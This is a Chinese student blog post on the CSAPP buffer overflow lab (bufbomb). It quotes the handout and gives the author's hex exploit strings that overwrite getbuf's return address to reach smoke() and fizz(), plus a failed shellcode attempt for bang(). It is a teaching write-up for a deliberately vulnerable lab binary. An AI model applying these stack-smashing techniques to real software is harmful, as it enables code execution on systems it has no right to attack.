CSAPP 六个重要实验 lab3

CSAPP && lab3

level2 & leve3未完,待更新! : )

In this lab, you will gain firsthand experience with one of the methods commonly used to exploit security weaknesses in operating systems and network servers. Our purpose is to help you learn about the runtime
operation of programs and to understand the nature of this form of security weakness so that you can avoid it when you write system code. We do not condone the use of these or any other form of attack to gain unauthorized access to any system resources. There
are criminal statutes governing such activities.

实验指导说明:

http://download.csdn.net/detail/u011368821/7920313

实验材料:

http://download.csdn.net/detail/u011368821/7920335

The Exploits

There are three functions that you must exploit for this lab. The exploits increase in difficulty. For those of you looking for a challenge, there is a fourth function you can exploit for extra credit.

Level 0: Candle

When getbuf() executes its return statement, the program ordinarily resumes execution within function test(). Within the file bufbomb, there is a function smoke():

void smoke()
{
entry_check(0); /* Make sure entered this function properly */
printf("Smoke!: You called smoke()\n");
validate(0);
exit(0);
}

Your task is to get bufbomb to execute the code for smoke() when getbuf() executes its return statement, rather than returning to test().You can do this by supplying an exploit string that overwrites the stored
return pointer in the stack frame for getbuf() with the address of the first instruction in smoke. Note that your exploit string may also corrupt other parts of the stack state, but this will not cause a problem, because smoke() causes the program to exit
directly.

Advice:

      • All the information you need to devise your exploit string for this level can be determined by examining a disassembled version of bufbomb.
      • Be careful about byte ordering.
      • You might want to use gdb to step the program through the last few instructions of getbuf() to make sure it is doing the right thing.
      • The placement of buf within the stack frame for getbuf() depends on which version of gcc was used to compile bufbomb. You will need to pad the beginning of your exploit string with the proper number of bytes to overwrite the return pointer. The values of
        these bytes can be arbitrary.
      • Check the line endings if your smoke.txt with hexdump -C smoke.txt.

我了个大X,调了几天才搞明白怎么用“溢出缓冲区攻击"

利用先构建一个输入文本,记录要数据的字符(溢出用)

我这里是

exploit.txt

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 01 02 03 04 05 06 07 08 c0 10 40 00 00 00 00 00

这里一定不要有换行符号(如果有也没关系,去生成的文件里,用vim打开编辑了之后去掉就是了)

这里一共0x30byte+8byte+8byte == 0x40byte

第一个0x30byte 是由于64bits的机器字节对齐导致的36byte的数组被扩展到0x30byte!

而后的8byte是之前 push %rbp 寄存器的value

最后的8byte是return address,也就是我们要”攻击“的地方!

考虑到机器的大小端.

smoke的地址是

00 00 00 00 00 40 10 c0

写入的时候应该是

 c0 10 40 00 00 00 00 00

这里把生成的数据记录到exploit.byte里面

接着把该文件作为输入就是啦~ : )

Level 1: Sparkler

问题解决基础:

/* $begin fizz-c */
void fizz(int arg1, char arg2, long arg3, char* arg4, short arg5, short arg6, unsigned long long val)
{
  entry_check(1);  /* Make sure entered this function properly */
  if (val == cookie) {
	printf("Fizz!: You called fizz(0x%llx)\n", val);
	validate(1);
  } else {
	printf("Misfire: You called fizz(0x%llx)\n", val);
  }
  exit(0);
}
/* $end fizz-c */

Similar to Level 0,
your task is to get bufbomb to execute the code for fizz() rather than returning to test.In this case, however, you must make it appear to fizz as if you have passed your cookie as its argument. You can do this by encoding your cookie in the appropriate
place within your exploit string.

Advice:

Note that in x86--64, the first six arguments are passed into registers and additional arguments are passed through the stack. Your exploit code needs to write to the appropriate place within
the stack.

You can use gdb to get the information you need to construct your exploit string. Set a breakpoint within getbuf() and run to this breakpoint. Determine parameters such as the address of global_value
and the location of the buffer.

在破坏原来test()调用getbuf push的return address之后,跳转到fizz,此时看到题目要求是要把cookie作为fizz的参数输入,根据反汇编得到的信息,我们可以看见这里

cmp 0x201296(%rip) %rsi

如果相等就会跳转到0x40109f接着顺利退出.

由于之前rsp寄存器的值没有被破坏,于是我们反推,如果”攻击rsp“的值,使得0x10(%rsp)指向 cookie

那么就可以顺利退出了!

由于最后leaveq的时候会把保存好的%rbp重新赋值给%rsp,于是

我们这里可以转而攻击保存好的%rbp,来实现间接改变%rsp

cmp 0x201296(%rip) %rsi

死死的扣住这句不放,这里吧0x201296(%rip) 地址处的值和%rsi的值比较

0x201296(%rip)

就是cookie的地址,然后这里%rsi是参数val的地址

cmp把cookie地址处的值!注意是cookie地址处的值,和%rsi比较

如果想等才能正确返回否则你看到的永远是missfire!

这里给出我的解

首先查看cookie地址处的值然后输入

exploit_for_level1.txt

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 20 23 60 00 00 00 00 00 70 10 40 00 00 00 00 00 00 00 00 00 00 00 00 00 c2 46 c1 21 48 ca 33 39

细心的人会发现,我这里在return address之上还多填了8byte的空间,接着才填充我们的答案.

这是因为return addres之上还有什么我这里确实不清楚,不过我这里这么做是根据反汇编的结果测试并计算出来的.

有心人可以一起讨论这里跳转到fizz之后之前寄存器的变化 : ) [email protected]

然后把exploit_for_level1.byte作为输入即可

Level 2: Firecracker

A much more sophisticated form of buffer attack involves supplying a string that encodes actual machine instructions. The exploit string then overwrites the return pointer with the starting address of these instructions.
When the calling function (in this case getbuf) executes its ret instruction, the program will start executing the instructions on the stack rather than returning. With this form of attack, you can get the program to do almost anything. The code you place
on the stack is called the exploit code. This style of attack is tricky, though, because you must get machine code onto the stack and set the return pointer to the start of this code.

For level 2, you will need to run your exploit within gdb for it to succeed. (attu has special memory protection that prevents execution of memory locations in the stack. Since gdb works a little differently, it
will allow the exploit to succeed.)

Similar to Levels 0 and 1, your task is to get bufbomb to execute the code for bang() rather than returning to test(). Before this, however, you must set global variable global_value to
your cookie. Your exploit code should set global_value, push the address of bang() on the stack, and then execute a retq instruction to cause a jump to the code for bang().

Advice:

Determining the byte encoding of instruction sequences by hand is tedious and prone to errors. You can let tools do all of the work by writing an assembly code file containing the instructions and data you want to put on the stack. Assemble this
file with gcc and disassemble it with objdump. You should be able to get the exact byte sequence that you will type at the prompt. (A brief example of how to do this is included in the Generating Byte Codes section above.)

Keep in mind that your exploit string depends on your machine, your compiler, and even your cookie. Make sure your exploit string works on attu or your VM, and make sure you include your UWNetID on the command line
to bufbomb.

Watch your use of address modes when writing assembly code. Note that movq $0x4, %rax moves the value

0x0000000000000004 into register %rax; whereas movq 0x4, %rax moves the value at memory location

0x0000000000000004 into %rax. Because that memory location is usually undefined, the second instruction will

cause a segmentation fault!

Do not attempt to use either a jmp or a call instruction to jump to the code for bang(). These instructions use PC- relative addressing, which is very tricky to set up correctly. Instead, push an address on the stack
and use the retq instruction.

这里我跳转到buffer地址的时候有问题...segment fault

我的尝试:

首先观察发现这里cmp 相等就会跳转并安全结束.

比较的两个对象是0x602320指向的value,而%rsi是global_value.

cookie的值在我们输入的时候就定了. 这里能改的就是global_value处(即0x602308处)的值了。

普通的做法是搞不定的.

这里必须自己写一段攻击代码——汇编形式的

然后在这段代码里面把cookie的值赋值给global_value,就成功了一半了,

接着把这段代码gcc -c 编译成obj。然后objdump去看相应的机器码

mov 0x602330,%rax 就对应的机器码就是

48 8b 04 25 20 23 60

不解释了

值得一提的是这里有

pushq $0x401020

和retq操作(稍后解释用途)

然后把这些机器码写到buffer里面去!

试想一下这里如果我覆盖的reture address是只想buffer头的,那么在buffer处的这些指令就得以执行.

接着当这些指令执行到最后的时候

pushq $0x401020

retq

这步就可以跳转到0x401020(bang函数头)。执行 bang函数,我们已经在攻击代码里面修改了global_value,那么cmp的结构就是0,je跳转,程序安全结束.

这仅仅是我的理论分析,我遇到的问题就是这里跳转到buffer头的时候会出现segment fault...

路过高手可以指教一下 : )

时间: 2024-11-09 16:57:37

CSAPP 六个重要实验 lab3的相关文章

CSAPP 六个重要实验 lab4

CSAPP && lab4 实验材料: http://download.csdn.net/detail/u011368821/7926305 实验指导书: http://download.csdn.net/detail/u011368821/7926323 实验环境: Linux 3.13.11 Ubuntu 14.0 Part I: An Experiment in C and Java Q&A Answer these questions: 1.  What are the s

CSAPP 六个重要实验 lab5

CSAPP  && lab5 实验指导书: http://download.csdn.net/detail/u011368821/7951657 实验材料: http://download.csdn.net/detail/u011368821/8019293 搞定这个实验还是要看一下以前的笔记,再复习一下block的组织方式,只看link里面第11节,动态内存分配的部分就可以了 http://blog.csdn.net/cinmyheart/article/details/38136375

CSAPP 六个重要实验 lab2

CSAPP  &&  lab2 哈哈~ 不愧是"美国进口的六级炸弹"!爽歪歪的"升级打怪" 我把实验材料都上传到下面这个link了,0分下载(良心啊~) http://download.csdn.net/detail/u011368821/7892649 再一个实验指导说明供大家下载: http://download.csdn.net/detail/u011368821/7892677 对于Phase_1的分析: 0000000000400ef0 &

CSAPP 六个重要实验 lab1

CSAPP && lab1 --------------------------------------------------------------------实验要求-------------------------------------------------------------------- The Bit Puzzles This section describes the puzzles that you will be solving in bits.c. More

CSAPP 六个重要实验 lab0(预热乱暖场 \-0-/ )

CS : APP  && Lab 0 之前在网上找了一会关于这几个实验的资料,发现都没有.其实washington university的<CSE351: The Hardware/Software Interface> 的课程实验. 伟大而又乐于分享的高校.WU 我陆续更新把这五个实验(这个预热的lab0不算,太简单,C入门的级别,这里指lab1~lab5),贴出来分析学习.希望更多的人能够收益. 开源,分享. --------------------------------

CSAPP缓冲区溢出攻击实验(上)

CSAPP缓冲区溢出攻击实验(上) 下载实验工具.最新的讲义在这. 网上能找到的实验材料有些旧了,有的地方跟最新的handout对不上.只是没有关系,大体上仅仅是程序名(sendstring)或者參数名(bufbomb -t)的差异,不影响我们的实验. 1.实验工具 1.1 makecookie 后面实验中,五次"攻击"中有四次都是使你的cookie出如今它原本不存在的位置,所以我们首先要为自己产生一个cookie. 实验工具中的makecookie就是生成cookie用的.參数是你的

CSAPP缓冲区溢出攻击实验(下)

CSAPP缓冲区溢出攻击实验(下) 3.3 Level 2: 爆竹 实验要求 这一个Level的难度陡然提升,我们要让getbuf()返回到bang()而非test(),并且在执行bang()之前将global_value的值修改为cookie.因为全局变量与代码不在一个段中,所以我们不能让缓冲区一直溢出到.bss段(因为global_value初始化为0,所以它会被放在.bss而非.data段以节省空间)覆盖global_value的值.若修改了.bss和.text之间某些只读的段会引起操作系

CSAPP 六个重要的实验 lab5

CSAPP  && lab5 实验指导书: http://download.csdn.net/detail/u011368821/7951657 实验材料: http://download.csdn.net/detail/u011368821/8019293 搞定这个实验还是要看一下曾经的笔记,再复习一下block的组织方式.仅仅看link里面第11节,动态内存分配的部分就能够了 http://blog.csdn.net/cinmyheart/article/details/3813637

[操作系统实验lab3]实验报告

[感受]: 这次操作系统实验感觉还是比较难的,除了因为助教老师笔误引发的2个错误外,还有一些关键性的理解的地方感觉还没有很到位,这些天一直在不断地消化.理解Lab3里的内容,到现在感觉比Lab2里面所蕴含的内容丰富很多,也算是有所收获,和大家分享一下我个人的一些看法与思路,如果有错误的话请指正. [关键函数理解]: 首先第一部分我觉得比较关键的是对于一些非常关键的函数的理解与把握,这些函数是我们本次实验的精华所在,虽然好几个实验都不需要我们自己实现,但是这些函数真的是非常厉害!有多厉害,呆会就知